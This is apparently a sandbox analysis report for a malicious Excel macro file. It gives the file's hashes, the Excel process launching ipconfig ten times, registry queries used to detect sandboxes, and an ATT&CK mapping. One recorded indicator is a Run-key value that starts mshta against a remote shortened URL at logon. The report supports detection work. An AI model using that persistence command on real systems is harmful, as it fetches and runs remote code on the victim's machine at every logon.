5b4314edaf2c1bc2e8edb57d84d9249ec97980bbf2d345859f66351d40995305

General

Target

stage1-macro.xls
Size

36KB
MD5

0f49e06aaab8816a9d95815e749fb291
SHA1

e124c99646e1d7fa682e465630eda2159172dcb1
SHA256

f5190d29af5ba58c45b138751593e2f5ed014d42e5c37f05f6ea98ee8838c9e2
SHA512

c09fa102c120b8e3cd7cddd88fa7d228f551be6ba81727bff8dbab84520bc7e456e82288fa91a86d18b9447fe3e2e866fc2dc4733d19b84666a4cdbfb50308e0
SSDEEP

384:AGF3dXzjwE8qUGiKu7kriCj1wnb9uCFtw5HNqldMbhuDBfrgfXGvmeeernB/:VdDD8qji/7GikKu0YHT9vv

Score

10^/10

persistence

Malware Config

Signatures

Process spawned unexpected child process 10 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

ipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	2824	4960	ipconfig.exe	EXCEL.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	4756	4960	ipconfig.exe	EXCEL.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	3948	4960	ipconfig.exe	EXCEL.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	2268	4960	ipconfig.exe	EXCEL.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	904	4960	ipconfig.exe	EXCEL.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	4532	4960	ipconfig.exe	EXCEL.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	3348	4960	ipconfig.exe	EXCEL.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	2540	4960	ipconfig.exe	EXCEL.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	4880	4960	ipconfig.exe	EXCEL.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	940	4960	ipconfig.exe	EXCEL.EXE

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

EXCEL.EXE

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fgiopoiuytresdfgh = "\"mshta\"\"http:\\\\j.mp\\fgiopoiuytresdfgh\""	EXCEL.EXE

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE

Gathers network information 2 TTPs 10 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

Processes:

ipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exe

pid	process
4756	ipconfig.exe
4532	ipconfig.exe
3348	ipconfig.exe
2540	ipconfig.exe
4880	ipconfig.exe
2824	ipconfig.exe
3948	ipconfig.exe
2268	ipconfig.exe
904	ipconfig.exe
940	ipconfig.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

4960 EXCEL.EXE
Suspicious use of SetWindowsHookEx 8 IoCs

Processes:

EXCEL.EXE

pid process

4960 EXCEL.EXE
4960 EXCEL.EXE
4960 EXCEL.EXE
4960 EXCEL.EXE
4960 EXCEL.EXE
4960 EXCEL.EXE
4960 EXCEL.EXE
4960 EXCEL.EXE

pid	process
4960	EXCEL.EXE

pid	process
4960	EXCEL.EXE
4960	EXCEL.EXE
4960	EXCEL.EXE
4960	EXCEL.EXE
4960	EXCEL.EXE
4960	EXCEL.EXE
4960	EXCEL.EXE
4960	EXCEL.EXE

Suspicious use of WriteProcessMemory 20 IoCs

Processes:

EXCEL.EXE

description	pid	process	target process
PID 4960 wrote to memory of 2824	4960	EXCEL.EXE	ipconfig.exe
PID 4960 wrote to memory of 2824	4960	EXCEL.EXE	ipconfig.exe
PID 4960 wrote to memory of 2268	4960	EXCEL.EXE	ipconfig.exe
PID 4960 wrote to memory of 2268	4960	EXCEL.EXE	ipconfig.exe
PID 4960 wrote to memory of 3948	4960	EXCEL.EXE	ipconfig.exe
PID 4960 wrote to memory of 3948	4960	EXCEL.EXE	ipconfig.exe
PID 4960 wrote to memory of 4756	4960	EXCEL.EXE	ipconfig.exe
PID 4960 wrote to memory of 4756	4960	EXCEL.EXE	ipconfig.exe
PID 4960 wrote to memory of 940	4960	EXCEL.EXE	ipconfig.exe
PID 4960 wrote to memory of 940	4960	EXCEL.EXE	ipconfig.exe
PID 4960 wrote to memory of 4880	4960	EXCEL.EXE	ipconfig.exe
PID 4960 wrote to memory of 4880	4960	EXCEL.EXE	ipconfig.exe
PID 4960 wrote to memory of 2540	4960	EXCEL.EXE	ipconfig.exe
PID 4960 wrote to memory of 2540	4960	EXCEL.EXE	ipconfig.exe
PID 4960 wrote to memory of 3348	4960	EXCEL.EXE	ipconfig.exe
PID 4960 wrote to memory of 3348	4960	EXCEL.EXE	ipconfig.exe
PID 4960 wrote to memory of 4532	4960	EXCEL.EXE	ipconfig.exe
PID 4960 wrote to memory of 4532	4960	EXCEL.EXE	ipconfig.exe
PID 4960 wrote to memory of 904	4960	EXCEL.EXE	ipconfig.exe
PID 4960 wrote to memory of 904	4960	EXCEL.EXE	ipconfig.exe

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\stage1-macro.xls"
1⤵
- Adds Run key to start application
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4960
- C:\Windows\SYSTEM32\ipconfig.exe
  ipconfig
  2⤵
  - Process spawned unexpected child process
  - Gathers network information
  PID:2824
- C:\Windows\SYSTEM32\ipconfig.exe
  ipconfig
  2⤵
  - Process spawned unexpected child process
  - Gathers network information
  PID:2268
- C:\Windows\SYSTEM32\ipconfig.exe
  ipconfig
  2⤵
  - Process spawned unexpected child process
  - Gathers network information
  PID:3948
- C:\Windows\SYSTEM32\ipconfig.exe
  ipconfig
  2⤵
  - Process spawned unexpected child process
  - Gathers network information
  PID:4756
- C:\Windows\SYSTEM32\ipconfig.exe
  ipconfig
  2⤵
  - Process spawned unexpected child process
  - Gathers network information
  PID:940
- C:\Windows\SYSTEM32\ipconfig.exe
  ipconfig
  2⤵
  - Process spawned unexpected child process
  - Gathers network information
  PID:4880
- C:\Windows\SYSTEM32\ipconfig.exe
  ipconfig
  2⤵
  - Process spawned unexpected child process
  - Gathers network information
  PID:2540
- C:\Windows\SYSTEM32\ipconfig.exe
  ipconfig
  2⤵
  - Process spawned unexpected child process
  - Gathers network information
  PID:3348
- C:\Windows\SYSTEM32\ipconfig.exe
  ipconfig
  2⤵
  - Process spawned unexpected child process
  - Gathers network information
  PID:4532
- C:\Windows\SYSTEM32\ipconfig.exe
  ipconfig
  2⤵
  - Process spawned unexpected child process
  - Gathers network information
  PID:904

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

3

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

Filesize
1KB

MD5
7ab85d5243fdef906df661b504ada963

SHA1
550b5bee166de9b7a400f0606b94bf7f80f706d3

SHA256
d4595e3e9b80fddd5d64872c2b1249caa1fedae1b61bb8c97095d9341c22407d

SHA512
e36f8074054e8181870ea90430c648e169822c4ba67e46fdb253632b302d7fdaa75a7f3dbdb73182955ef434f8955f42bb6b0d97c425eed3bdb47a23fb99c11c

Download Submit
memory/4960-9-0x00007FFDA3CB0000-0x00007FFDA3EA5000-memory.dmp

Filesize
2.0MB

Download
memory/4960-4-0x00007FFD63D30000-0x00007FFD63D40000-memory.dmp

Filesize
64KB

Download
memory/4960-17-0x00007FFDA3CB0000-0x00007FFDA3EA5000-memory.dmp

Filesize
2.0MB

Download
memory/4960-3-0x00007FFD63D30000-0x00007FFD63D40000-memory.dmp

Filesize
64KB

Download
memory/4960-6-0x00007FFDA3CB0000-0x00007FFDA3EA5000-memory.dmp

Filesize
2.0MB

Download
memory/4960-5-0x00007FFDA3CB0000-0x00007FFDA3EA5000-memory.dmp

Filesize
2.0MB

Download
memory/4960-0-0x00007FFD63D30000-0x00007FFD63D40000-memory.dmp

Filesize
64KB

Download
memory/4960-11-0x00007FFDA3CB0000-0x00007FFDA3EA5000-memory.dmp

Filesize
2.0MB

Download
memory/4960-10-0x00007FFDA3CB0000-0x00007FFDA3EA5000-memory.dmp

Filesize
2.0MB

Download
memory/4960-12-0x00007FFD61660000-0x00007FFD61670000-memory.dmp

Filesize
64KB

Download
memory/4960-8-0x00007FFDA3CB0000-0x00007FFDA3EA5000-memory.dmp

Filesize
2.0MB

Download
memory/4960-7-0x00007FFD63D30000-0x00007FFD63D40000-memory.dmp

Filesize
64KB

Download
memory/4960-13-0x00007FFDA3CB0000-0x00007FFDA3EA5000-memory.dmp

Filesize
2.0MB

Download
memory/4960-14-0x00007FFD61660000-0x00007FFD61670000-memory.dmp

Filesize
64KB

Download
memory/4960-75-0x00007FFDA3CB0000-0x00007FFDA3EA5000-memory.dmp

Filesize
2.0MB

Download
memory/4960-2-0x00007FFD63D30000-0x00007FFD63D40000-memory.dmp

Filesize
64KB

Download
memory/4960-16-0x00007FFDA3CB0000-0x00007FFDA3EA5000-memory.dmp

Filesize
2.0MB

Download
memory/4960-29-0x00007FFDA3CB0000-0x00007FFDA3EA5000-memory.dmp

Filesize
2.0MB

Download
memory/4960-30-0x00007FFDA3D4D000-0x00007FFDA3D4E000-memory.dmp

Filesize
4KB

Download
memory/4960-31-0x00007FFDA3CB0000-0x00007FFDA3EA5000-memory.dmp

Filesize
2.0MB

Download
memory/4960-1-0x00007FFDA3D4D000-0x00007FFDA3D4E000-memory.dmp

Filesize
4KB

Download
memory/4960-55-0x00007FFDA3CB0000-0x00007FFDA3EA5000-memory.dmp

Filesize
2.0MB

Download
memory/4960-59-0x00007FFDA3CB0000-0x00007FFDA3EA5000-memory.dmp

Filesize
2.0MB

Download
memory/4960-58-0x00007FFDA3CB0000-0x00007FFDA3EA5000-memory.dmp

Filesize
2.0MB

Download
memory/4960-51-0x00007FFDA3CB0000-0x00007FFDA3EA5000-memory.dmp

Filesize
2.0MB

Download
memory/4960-71-0x00007FFD63D30000-0x00007FFD63D40000-memory.dmp

Filesize
64KB

Download
memory/4960-72-0x00007FFD63D30000-0x00007FFD63D40000-memory.dmp

Filesize
64KB

Download
memory/4960-74-0x00007FFD63D30000-0x00007FFD63D40000-memory.dmp

Filesize
64KB

Download
memory/4960-73-0x00007FFD63D30000-0x00007FFD63D40000-memory.dmp

Filesize
64KB

Download
memory/4960-15-0x00007FFDA3CB0000-0x00007FFDA3EA5000-memory.dmp

Filesize
2.0MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads